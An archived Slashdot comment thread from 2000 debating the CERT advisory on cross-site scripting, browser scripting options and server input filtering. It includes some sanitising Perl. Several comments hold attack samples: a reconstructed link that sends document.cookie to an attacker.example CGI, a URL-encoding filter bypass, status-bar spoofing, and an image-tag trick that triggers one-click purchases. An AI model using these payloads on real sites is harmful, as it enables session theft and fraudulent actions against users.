    Consider Slashdot, for example.. you'll notice that it says Allowed HTML and has a list of permitted tags when you are posting. This is so that you don't do anything funny with javascript, forms, or even the blink tag (yuk).. any site that accepts input like this needs to scan for possible malicious tags.

    One more concern I've seen is generic error message pages, where the error message is passed in using a GET type encoding on the URL line. This is so that admins don't have to make multiple pages for "password incorrect", "no username", "our database is down/broken", etc.. however a user can just change the error message that is passed in and possibly include malicious tags in it. I'd recommend using error codes instead, that map to hard-coded error messages.
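
    A small sketch of that error-code approach (the codes and messages here are invented): the URL carries only a number, and the text lives server side where nobody can inject tags into it:

    use strict;
    use CGI;

    my %ERRORS = (
        1 => 'Incorrect password.',
        2 => 'No such username.',
        3 => 'The database is temporarily unavailable.',
    );

    my $q = CGI->new;
    my ($code) = ($q->param('err') || '') =~ /^(\d+)$/;   # accept digits only

    print $q->header,
          $q->start_html('Error'),
          $q->p($ERRORS{$code || 0} || 'An unknown error occurred.'),
          $q->end_html;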

  • I blame mobile code for this fiasco. My precise definition of "mobile code" is "code that crosses a trust barrier". Thus examples of things that are mobile code include:

    • Java and Javascript applets
    • Macros attached to MS Office documents
    • ActiveX "controls"
    • "Foreign" active network applets running on "my" routers
    • E-mail attached .exe files
    Examples of things that are not mobile code include:

    • computational functions migrating around a distributed cluster
    • agents migrating around a LAN or a distributed virtual LAN
    • vendor-supplied upgrades to a system
    • duly authorized installation of new software
    • Java applications that were explicitly installed to add functionality
    By these definitions, I argue that mobile code presents far more threat than benefit. The "weak benefit" argument is that most of the benefit provided by mobile code comes in the form of dynamically interactive applets. The applets provide finer-grained interactivity with the user. This is strictly an ease-of-use issue, as the server must check everything that the applet produces. The only applications where this actually matters are games, and people who give up security for gaming get what they deserve :-) Less flippantly, game applets are easy to effectively sandbox by giving them absolutely zero access to the client workstation.

    The "major hazard" part comes from the difficulty of effectively confining an untrusted applet such that it gets controlled access to the client host workstation. The more complex the semantics of interpreting downloaded information, the more difficult it is to establish whether it is safe (cf recent discussion on firewall-wizards about whether CheckPoint FW1 is effectively stripping dangerous tags from HTML content). The more powerful the semantics of the downloaded information, the more able the adversary is to build attacks that escape static analysis by computing the actual attack code on the fly.

    I think that powerful tools are required to enable administrators to enforce a ban on active content. These tools might include:

    • a filter that can strip macros from MS Office documents
    • firewalls and browsers that detect active content (Java, Javascript, ActiveX, MS Office macros, etc.) and send back an e-mail to postmaster@originating.site explaining that their active content has been stripped, and they had best prepare documents and web pages that work without the active content.
    That last tool is an especially powerful thing that the open source community can do to try to smarten up giddy web developers who think that every new feature to come along is just so cool that it must be used. To make the web safe to surf, we need to push back against the goobers who are re-defining HTML to require scripting to make a site usable.
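
    By way of illustration, a crude version of such a stripping filter might look like this in Perl. A production tool would need a real HTML parser rather than regexes, and the tag list below is only a guess at what "active content" should cover:

    use strict;

    # Remove the most common kinds of client-side active content from a page.
    sub strip_active_content {
        my ($html) = @_;
        $html =~ s/<script\b.*?<\/script\s*>//gis;                # inline JavaScript
        $html =~ s/<(applet|object|embed)\b.*?<\/\1\s*>//gis;      # Java, ActiveX, plugins
        $html =~ s/\son\w+\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)//gi;    # onClick=, onMouseOver=, ...
        return $html;
    }

    print strip_active_content(join '', <>);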
  • by Sabotage ( 21481 ) on Wednesday February 02, 2000 @10:54AM (#1310813)
    I think the original poster was trying to say something a bit different.

    The Scenario: I, malicious content poster and author of evil pseudoscientology books, post a perfectly normal looking URL that actually links to the URL for the one-click 'buy this' stuff.

    You, innocent reader and user of Amazon's one-click shopping, decide to follow my link. Next thing you know, you've purchased my book and I get royalties. You already had the Amazon cookie on your machine because of past purchases. I wasn't trying to get you to pay for something that ended up in my hands, I was merely trying to get you to PAY for something.

    I'm not an Amazon frequenter, so I don't know what the URLs look like or if this is even possible.. I'm just clarifying the original poster's suggestion.
  • by schon ( 31600 ) on Wednesday February 02, 2000 @02:05PM (#1310814)
    Basically, all clients and all Web servers are affected by this problem

    Well, in a word, no.

    Apache, MS, and Sun's server products are affected by this, but that's hardly every web server.

    Roxen [roxen.com] is not affected, as by default it dequotes all input sent by a client. If explicitly requested, the web page author can get the raw data, but by default, the designer doesn't have to worry about it. (This is one of my favourite features of Roxen :o)

    Co-incidentally (or perhaps not), Roxen is the web server used by Securityfocus.com (the administrators of BugTraq)
  • by bridgette ( 35800 ) on Wednesday February 02, 2000 @12:13PM (#1310815)
    Websites that are totally unusable without scripting will begin to feel some pressure to clean up their acts.

    Obviously most "major" sites don't give a rat's ass if they piss off or exclude a few geeks who get all 'paranoied' about security - or worse yet, run some non Win OS or some non IE/NS browser. (OT: don't get me started on the ones that require flash)

    We can only hope that if 'joe average' starts disabiling scripting and complaing about all the sites that no longer work, maybe, just maybe, the web will become a bit more 'geek-friendly'

    EOR
  • by fegu ( 66137 ) <Finn@ G u n d e rsen.net> on Wednesday February 02, 2000 @11:35AM (#1310816) Homepage
    Siemens has developed a free-for-non-commercial-use small webproxy designed to be installed on either a client machine or a server (Win98/NT/2K only, mind you). It has lots of configurable options, including eliminating popups and graphics of user-definable sizes (provided the IMG links contain HEIGHT and WIDTH attributes, the proxy doesn't even load them). I have used it for a year now and I am very happy with it. Speeds up the browsing and reduces visual noise.

    Go to http://www.webwasher.de (English site). A separate company called Webwasher.com AG now promotes it, but it was originally designed by Siemens.
  • by zantispam ( 78764 ) on Wednesday February 02, 2000 @11:43AM (#1310817)
    Actually, this one would probably screw you worse...

    Yes kids, it is malicious...

    (Actually, I could make it worse still if I could figure out a way to make /. recognize onMouseOver and onMouseOut. Put a killer javascript link in, onMouseOver="window.status='http://friendlyplace.com'; return true" onMouseOut="window.status='Document: Done'; return true". That would be killer...)

    Here's my [redrival.com] copy of DeCSS. Where's yours?
  • by Cyberllama ( 113628 ) on Wednesday February 02, 2000 @10:36AM (#1310818)

    I don't think any experienced users will have any problems with this. Anything you put in the comments will show up when the mouse cursor is over the document (well, not in lynx, but you get the idea) so you see the link location; in this case you'll see code. It's also interesting to note that IE has the additional insecurity that you can actually EMBED HTML CODE DIRECTLY INTO THE HYPERTEXT LINK ITSELF using "about:". For some strange reason, if you click on a link that starts with "about:" instead of an actual website, IE will echo all that information back as if it were a webpage (including parsing of any HTML). An example? IE users can paste (slashdot won't let me actually post it as a hyperlink, which is good) this url into their browser: "about://(html)(head)(title)hi(/title)(/head)(p)Hi all you crazy IE users(/p)(/html)", replacing all the ('s and )'s with greater-than and less-than signs.

    NOTE: I'm pretty sure it was about: that caused this unusual effect (it might have been something else, I don't have IE handy to test with). If it's something else, someone else can respond and correct me. (It's been over a year since I discovered this; I sent it to bugtraq, but it was never posted, and according to the moderator this was a well-known thing, which I'm sure it is.)

  • by dbm00 ( 117570 ) on Wednesday February 02, 2000 @10:15AM (#1310819) Homepage
    Frankly, I think this kind of notice is totally irresponsible on the part of CERT. This is exactly the kind of news that the media loves to latch onto and turn into all kinds of sensational press. CERT actually recommends in their notice that users disable all scripting in their browsers! There may well be a security issue here, but that does not justify risking a major consumer panic... Scripting is a key feature of almost every interesting site these days-- even the ones that don't do a ton of stuff on the client side have nice "mouseovers" to allow friendly messages for the user at the bottom of the screen.

    Following CERT's recommendations amounts to disabling a vast part of the web's functionality entirely. They should have cooperated with other authorities on the web to publish this information in a more sensible manner. Doing things this way just draws attention to a problem that can be solved inside of the engineering circle and without bugging the consumer.

    Just my two cents...
  • by dbm00 ( 117570 ) on Wednesday February 02, 2000 @10:42AM (#1310820) Homepage
    The only way we can reliably fix this hole is for all of us running servers to remove trust of clients -- we can't depend on clients to disable scripting or cookies.

    And that is really the key. Not only can we not depend on them to disable scripting and cookies, we SHOULD NOT depend on them to do so... It makes all the "good guys" lives that much more difficult when they can't take advantage of the neat technologies available to users just because there are those out there abusing them.

    IMHO, most of this problem could be solved by having smarter browsers. Granted, it is a difficult problem, but what is this about ActiveX controls allowing you to reformat a hard drive!? That is utterly ridiculous. I can't believe that any browser manufacturer would even consider allowing this kind of access to the underlying OS (and I actually _like_ IE).

    My proposal:


    1) Make it a no-brainer for the consumer... Don't bother them at all unless there is a genuine crisis. Exploitable security holes are only genuinely a crisis if they do something worse than crash a machine-- which happens a lot anyways to those of us who aren't running "real" operating systems.

    2) Make it almost a no-brainer for the developer. I should have to think about invalid input from the user, definitely. But I shouldn't have to worry about buffer overrun errors and the like... The subsystems I develop on should be robust.

    3) Make it the browser developer's job to keep the system safe from the Web. The browser is our "window" into the web. Thus, IT should filter the nasties that might come in...
  • by Animats ( 122034 ) on Wednesday February 02, 2000 @09:23PM (#1310821) Homepage
    Check out the "digital wallet" system being promoted by ECML.org [ecml.org]. This is a system intended to make it very easy for a merchant to obtain credit card and address information from your "digital wallet". You're supposed to have to click on something, but it's not clear if that mechanism can be subverted by script-based attacks.

    On a related note, the "digital wallet" mechanism doesn't generate enough data to log the transaction properly at the consumer end. Despite the fact that XML was designed to do exactly that sort of thing, the "digital wallet" system is one-way. You don't get the equivalent of a credit card receipt in XML for your transaction. The way this ought to work is that your wallet is sent an XML invoice and if the user accepts it, a signed XML purchase order with payment info and amount being paid is returned, after which a signed XML purchase information confirmation should come back, get checked against the payment info sent, and get logged into the wallet. That would provide proper accounting controls for the consumer, like physical credit card receipts. But no, that's not how it works. It just sends your credit card info somewhere when you click.

  • by takemiya ( 139902 ) on Wednesday February 02, 2000 @11:23AM (#1310822)
    Remember, when you browse someone's site, you browse every site that person has browsed...
  • by TheGratefulNet ( 143330 ) on Wednesday February 02, 2000 @10:10AM (#1310823)
    see www.jodi.org [jodi.org] as an example of how JS can screw you over.

    for some windows users, their system may lock up very tightly. so while there's no direct harm in this, it's rude as hell and is just another example of how client-side auto-executable code is a bad, bad, BAD thing.

    if you want web-based executables, they should properly execute on a server and NOT on the client.

    --

  • by I)ruid ( 147754 ) on Wednesday February 02, 2000 @12:06PM (#1310824) Homepage
    This is not a new discovery; in fact, we released an advisory about it in December of 1998. The advisory can be found here: http://www.caughq.org/files/pub/Advisories/000005 [caughq.org]. This advisory was sent at the time of release to Yahoo, who promptly fixed their search engine, and was also sent to the BugTraq mailing list, where it was promptly denied posting because "This isn't a hack." This has been around for quite a long time; I guess it just takes a CERT advisory to make people take notice.
    NOTE: This is a duplicate post, the original was posted in reply to the wrong post
  • by pridkett ( 2666 ) on Wednesday February 02, 2000 @01:03PM (#1310825) Homepage Journal

    Am I the only one who said "well, geez, that's obvious, a monkey could have figured that out"? The issue is just people being smart about how they handle user-provided input. We've all seen this sort of stuff for a long time, so it surprises me that CERT would issue a warning on something like this.

    Just don't be a bonehead when writing your stuff. Strip out all tags then apply them again later if needed.

    $_ =~ s/</&lt;/g;
    $_ =~ s/>/&gt;/g;
    $_ =~ s/&lt;\s*(\/?)\s*b\s*&gt;/<$1b>/gi;

    This escapes all HTML tags and then restores properly formatted <B> and </B> tags.

    Grow a brain. It helps.

  • by CodeShark ( 17400 ) <ellsworthpc@NOspAm.yahoo.com> on Wednesday February 02, 2000 @01:13PM (#1310826) Homepage
    I did the old "view source trick" to see what you actually did. ('Cause I really didn't want to send you my slashdot cookies.)

    I hope you don't mind my explaining what the link would do if someone actually clicked it. This is an absolutely brilliant demonstration of the security hole. The link works like this:

    1. the standard <A HREF= "" opening, followed by
    2. an http...slashdot page which I assume is bogus.
    3. Without closing the HREF, Mark then included a <script> tag, with the
    4. location set to his server's printenv as the target, and the
    5. document.cookie (for /.) as part of the query string of the http request which this script would send.
    6. Then he closed the script tag (</SCRIPT>), then the HREF.
    Absolutely brilliant. The rough shape of the markup is sketched below. Like he said: DO NOT FOLLOW THIS LINK [slashdot.org]
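    For those who don't want to view source themselves, the injected markup is shaped roughly like this; the attacker host and CGI path here are made up (the real link pointed at Marc's own printenv), and note that the HREF's opening quote is never closed before the script starts:

    <A HREF="http://slashdot.org/not-a-real-page
    <SCRIPT>
    document.location = 'http://attacker.example/cgi-bin/printenv?' + document.cookie;
    </SCRIPT>
    ">DO NOT FOLLOW THIS LINK</A>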
  • by Plasmic ( 26063 ) on Wednesday February 02, 2000 @11:02AM (#1310827)
    Sun Microsystems has posted their recommendations for Java Web Server [sun.com].

    Apache has also put up an advisory of sorts, CSS Cross Site Scripting Info [apache.org]. They make several valid points; this is my favorite:

    It is not an Apache problem. It is not a Microsoft problem. It is not a Netscape problem. In fact, it isn't even a problem that can be clearly defined to be a server problem or a client problem. It is an issue that is truly cross platform and is the result of unforeseen and unexpected interactions between various components of a set of interconnected complex systems.
    CERT has a collection of helpful stuff up about Understanding Malicious Content Mitigation for Web Developers [cert.org].

    (Disclaimer: This post is guaranteed to be free of malicious HTML tags embedded in client web requests by the author)
  • by Genaro ( 30541 ) on Wednesday February 02, 2000 @10:42AM (#1310828)
    Quite on the contrary!

    This has been an issue for a long time. If, at the time you read this, the issue is still unsolved, it only means that the industry will not solve it by itself.

    Users should demand better security, and the only way they can do that is by being informed of the risks involved.

    We have seen soooo many sites depending on these features for no reason at all, for sooooo long.

    I think more pressure is needed.
  • by devphil ( 51341 ) on Wednesday February 02, 2000 @11:06AM (#1310829) Homepage
    Eli the Bearded posted a perl script to alt.hackers recently that edits the Netscape binary and disables certain Javascript "features".

    If you don't read alt.hackers or have no idea what a really cool hack that is, then fire up whatever browser the Linux Lemmings are using this week and go to DejaNews. (I don't recall whether his article has an X-No-Archive header in it or not, YMMV.)

  • by gnarphlager ( 62988 ) on Wednesday February 02, 2000 @10:19AM (#1310830) Homepage
    DAMNIT. Netscape caught me out with that Opera floozy again. Let alone Mozilla . . . that's like doinking your partner's sibling!!!! And who KNOWS what sort of disease I'll pick up with IE . . . . .
  • by DeadSea ( 69598 ) on Wednesday February 02, 2000 @10:40AM (#1310831) Homepage Journal
    I really doubt that slashdot is immune to this.
    The article brings up the point that malicious scripts can be submitted in links like this one. When you click on them you execute malicious code.

    <A href="http://example.com/comment.cgi?mycomment= <SCRIPT>malicious code</SCRIPT>"> Click Here</A>

    Slashdot wouldn't allow this (I assume) because it would see the script tag and not allow it.

    It would be very easy to fool slashdot in this instance. (I haven't tried it, so correct me if I am wrong.) When URLs are submitted to a server, they are often URL-encoded: characters are replaced by a percent sign followed by their hexadecimal ASCII value. You have probably seen %20 in place of a space many times; it's one of the most common, but it can be done with any character. The first thing a server usually does when it gets a page request is URL-decode it.

    So now imagine that I create the link:

    <A href="http://example.com/comment.cgi?mycomment= %60%83%67%82%73%80%84%62malicious code%60%47%83%67%82%73%80%84%62"> Click Here</A>

    Now Slashdot doesn't find script tags, but the server that gets the URL still does.
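    The fix is to do the filtering after the input has been URL-decoded, not before. A minimal sketch in Perl, assuming the stock CGI.pm and HTML::Entities modules (the field name is made up):

    use CGI qw(param);
    use HTML::Entities qw(encode_entities);

    my $comment = param('mycomment');      # CGI.pm hands this back already URL-decoded
    $comment = encode_entities($comment);  # <, >, &, " become harmless entities
    print "Content-type: text/html\n\n";
    print $comment;                        # now safe to echo back to the browser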

  • by autechre ( 121980 ) on Wednesday February 02, 2000 @10:18AM (#1310832) Homepage
    On the browser end? Yes, there have been ActiveX exploits that are quite bad,
    including one which allowed--you guessed it--formatting of your hard drive.
    ActiveX was going at a rate of 1 exploit per week for a while, though it
    does seem to have quieted down a bit.

    On the server end, it can be far more serious. If you're using perl scripts,
    and your scripts accept input with any characters (ie, pathnames, executable
    code), you may quite easily be hacked. Ditto if you're using something like
    PHP and MySQL; if you accept SQL commands as valid input, you're krunked.

    I can't give concrete examples, because I don't feel skilled enough; however,
    one only needs to peruse the BUGTRAQ archives at securityfocus.com to see
    plenty of them.
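    For the database case, the usual defense is to never splice user input directly into the SQL string; with Perl's DBI you can use placeholders so the input is always treated as data. A rough sketch, with the database, table, and field names all made up:

    use DBI;
    use CGI qw(param);

    my $name = param('author');      # untrusted user input straight from the browser

    # connection details here are invented for illustration
    my $dbh = DBI->connect('DBI:mysql:database=guestbook', 'guest', 'secret')
        or die $DBI::errstr;

    # BAD:  "SELECT body FROM posts WHERE author = '$name'"  -- $name may contain SQL
    # GOOD: the ? placeholder means $name is always treated as data, never as SQL
    my $sth = $dbh->prepare('SELECT body FROM posts WHERE author = ?');
    $sth->execute($name);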
  • by gwalla ( 130286 ) on Wednesday February 02, 2000 @11:33AM (#1310833) Homepage

    I added a request for this in bugzilla [mozilla.org]. It is Bug #26272 [mozilla.org]. If you have some spare browser-component votes, vote for it [mozilla.org]. If you don't have a (free) bugzilla account yet, get one [mozilla.org].


    ---
  • by Marc Slemko ( 6200 ) on Wednesday February 02, 2000 @11:44AM (#1310834)
    Do not follow this link. Warning: it will send any slashdot cookies that you have (i.e. if you are logged in) to my web server, where they will end up in the logs. The cookies will appear as the query string for printenv. No one else has access to the machine and I will not do anything with them, but can you trust me? If you are confident it can't be done, you have nothing to worry about. Javascript has to be enabled for this to work. Most of the people dismissing this problem don't realize the implications. (The link should come out properly, at least it previews right, but getting the right chars in there can be tricky sometimes...) DO NOT FOLLOW THIS [slashdot.org]
  • by GoRK ( 10018 ) on Wednesday February 02, 2000 @11:11AM (#1310835) Homepage Journal
    A Javascript OnMouseOver inside an Anchor tag can change the apparent destination of a link by changing the text in the status window. So unless you like digging through the page's HTML and checking out the link you're clicking, this isn't really verifiably secure.

    I for one think this is a stupid feature of javascript. I want the statusbar to tell me what the link is doing. A webpage shouldn't have the ability to screw with my browser's status bar! At least this should be a javascript option -- "Restrict Statusbar control" -- as other people have pointed out -- on and off aren't enough control!
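    For anyone who hasn't run into it, the trick is a one-liner; both URLs below are made up:

    <A HREF="http://attacker.example/grab-cookies"
       onMouseOver="window.status='http://slashdot.org/'; return true;">
    looks perfectly harmless in the status bar</A>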

    ~GoRK
  • I think that CERT is pointing fingers at the wrong people here. Relying on the site provider to filter hostile code from messages is naive and foolish. If a website can execute hostile code, someone WILL make a website to do it anyway.
    Browsers should not execute harmful code in the first place. Any code beyond trivial JavaScript needs to be cryptographically signed and verified before being executed. Clients should warn if the code has not been signed with the certificate of the document owner, provided through a metatag (yes, I know this doesn't verify the document owner's identity). Pages should also have the option of passing a metatag like "DisAllowTags 'IMG FONT SCRIPT EMBED'" to keep clients from attempting to parse certain tags and possibly execute code.

    Although I have placed most of the blame on the browser, let me say that the client should not be the only line of defense. Servers that allow posting of external HTML should certainly filter images and scripted content.

    I did like CERT's points about SSL and cookie poisoning. Has anyone generated proof of concept code or heard of this being exploited?

    That's my $0.02. I'd like to hear opinions on providing
  • by SurfsUp ( 11523 ) on Wednesday February 02, 2000 @10:32AM (#1310837)
    Desperately needed JavaScript options are:
    -no pop-ups (display pop-up requests in a dedicated widget)
    -no clickless redirection (display as links in a pseudo-frame or with a dedicated widget)
    I'd like to point out once again (sorry if I sound like a broken record, but a lot of people seem to forget this) that you don't have to ask for such options: you can get and hack your own private copy of Mozilla. When you've perfected the ultimate Javascript security patch, contribute it to the tree.
  • by Sloppy ( 14984 ) on Wednesday February 02, 2000 @11:03AM (#1310838) Homepage Journal

    CERT actually recommends in their notice that users disable all scripting in their browsers!

    Yeah, so? That has been good advice ever since the client-side scripting stuff started to show up.

    Scripting is a key feature of almost every interesting site these days

    Bullshit. You must be on a different web than I am, because I have never seen a web site where Javascript was a key feature -- not counting stuff like games that are written to show off what Javascript can do. From what I've seen, the main use of Javascript is that newbie webmeisters try to use it as a replacement for links.

    even the ones that don't do a ton of stuff on the client side have nice "mouseovers" to allow friendly messages for the user at the bottom of the screen.

    This is your idea of a "key feature"?! Look, if the web needs menus, that's fine. But running scripts on the client side isn't the right way to add that feature. Anybody with half a brain could do a lot better.

    Following CERT's recommendations amounts to disabling a vast part of the web's functionality entirely.

    Bullshit.

    Doing things this way just draws attention to a problem that can be solved inside of the engineering circle and without bugging the consumer.

    The engineering circle has had years to do something about this crap. They didn't. Browser makers could have shipped their browsers with all client-side execution "features" disabled by default, all along. They didn't. They could have put up a warning popup that tries to scare the user whenever they turn this stuff on. They didn't. Who are you calling irresponsible?


    ---
  • by NMerriam ( 15122 ) <NMerriam@artboy.org> on Wednesday February 02, 2000 @10:04AM (#1310839) Homepage
    This one really took me by surprise as a web developer. I have to admit that it had never occurred to me not to trust the client in this manner (although there's nothing on any of my sites that would be capable of being abused in this way).

    But considering the number of dynamic sites that are being thrown up on a regular basis, especially with folks adding messageboards as quickly as possible in hopes of building a "community", I suspect this failure is present on a lot of large sites.

    For those who aren't reading the advisory, it essentially says that sending someone a malicious link (a link that puts code in the input strings) could cause a server to return that malicious code to their browser, since the server assumes the client sent it knowingly.

    Needless to say, a lot of folks who don't pay attention to status bars and address bars could fall prey to all sorts of exploits based on this that don't require "running" anything on the client machine that a typical security app could catch. The only way we can reliably fix this hole is for all of us running servers to remove trust of clients -- we can't depend on clients to disable scripting or cookies.
  • by Webmonger ( 24302 ) on Wednesday February 02, 2000 @10:07AM (#1310840) Homepage
    Sure, you can run arbitrary Javascript if you use links. Here's a (safe) example.
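    (The live link from the original post doesn't survive here, but the harmless version of the idea is just a javascript: URL, something along these lines:)

    <A HREF="javascript:alert('this could have been any script')">a (safe) example</A>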
  • by TheDullBlade ( 28998 ) on Wednesday February 02, 2000 @10:10AM (#1310841)
    Browsers should never have been made to have only one JavaScript option: on or off.

    You ought to be able to limit your JavaScript functionality in many different ways. I browse with JavaScript off all the time, to prevent automatic pop-ups, but I have to turn it back on because so many sites just don't work with JavaScript turned off (often for no good reason: JavaScript links instead of HTML links, for example).

    Desperately needed JavaScript options are:
    -no pop-ups (display pop-up requests in a dedicated widget)
    -no clickless redirection (display as links in a pseudo-frame or with a dedicated widget)

    With these, I could happily browse all sites with the same settings.

    I can't think of any others yet (I think they depend on the specific environment; aren't there some real security hazards?), but I'm sure there are more. What am I missing?

    (aside from JavaScript, turning off all animations is another much-needed option)
  • by IIH ( 33751 ) on Wednesday February 02, 2000 @10:11AM (#1310842)
    When "one-click" shopping from Amazon came out, I was concerned because of the security aspects, and this warning seems to cover one of the possible ways that it could be abused. AFAIK, when at amazon, if you have OneClickShopping turned on, it sends the cookie when you click on a url and you buy the product without any further confirmation.

    However, because of the no-confirmation aspect, what is to stop someone sending/posting a message which includes an image link to that "buy" url? Unless Amazon has a security check to stop this, it would be the ultimate spam email: everyone who read it would buy your product!

    Can someone confirm/check if there are safeguards (eg referrers) that stop this simple abuse of OneClickShopping?
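    The attack being described needs nothing fancier than an image tag pointing at the "buy" URL, so that merely rendering the message fires the request with the reader's cookies attached. The URL below is invented; I don't know what Amazon's real one-click URL looks like:

    <IMG SRC="http://bookstore.example/one-click-buy?item=12345" WIDTH="1" HEIGHT="1">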

    --
  • by seligman ( 58880 ) on Wednesday February 02, 2000 @11:16AM (#1310843) Homepage
    Here's a cute example for those of you logged in right now (not sure this will work in every browser, but it should). It doesn't actually do anything, but it would be trivial to redirect you to another page and log the information.

    Even though I kind of find it useful, I think running a script like this should at least be an option in the browser.

  • by Niko. ( 89205 ) on Wednesday February 02, 2000 @10:06AM (#1310844)
    OK folks, now we really need our browsers to have heavy-duty cookie control, IP filtering, and perhaps even some Java, JS and html "smell-checking".

    I for one would like to see antibookmarks. Control-click on a banner, that server is blocked. Surf into a trap website, hit an fkey, add its domain to a killfile.

    Websurfing is supposed to be promiscuous; that's the idea, I thought. (No pr0n jokes, OK?)
  • by gfxguy ( 98788 ) on Wednesday February 02, 2000 @10:45AM (#1310845)
    I love these suggestions - along with:
    • Not allowing anything to "attach" itself to any buttons on my browser. It's MY browser, and if I want to go BACK or FORWARD then I want to go BACK or FORWARD. Who decided someone should be able to override that?

    • Ability to browser spoof - set what your browser tells sites about your system, the browser itself, etc., thereby making idiot sites that ONLY allow Netscape or ONLY allow IE useless.

    • Asking before opening a window - with the option to open the selected URL in the CURRENT window.

    • You can interactively allow cookies - why can't we interactively allow our names or other information to be sent?

    The thing is, I tried the latest Mozilla and it didn't really render properly. Are any of these privacy/security/paranoia options in there? I'll have to check it out in more detail. At least with the source one can add these in themselves.
    ----------
  • by rellort ( 146793 ) on Wednesday February 02, 2000 @10:01AM (#1310846)
    That's right, you should not engage in promiscuous browsing on sites you hardly know. If you do, you should practice safe surfing and use an HTTProphylactic.

    (Look ma! I can spell "prophylactic"! Can you believe the college man said I was dumb because I couldn't make a Lego robot?)

"No matter where you go, there you are..." -- Buckaroo Banzai

Working...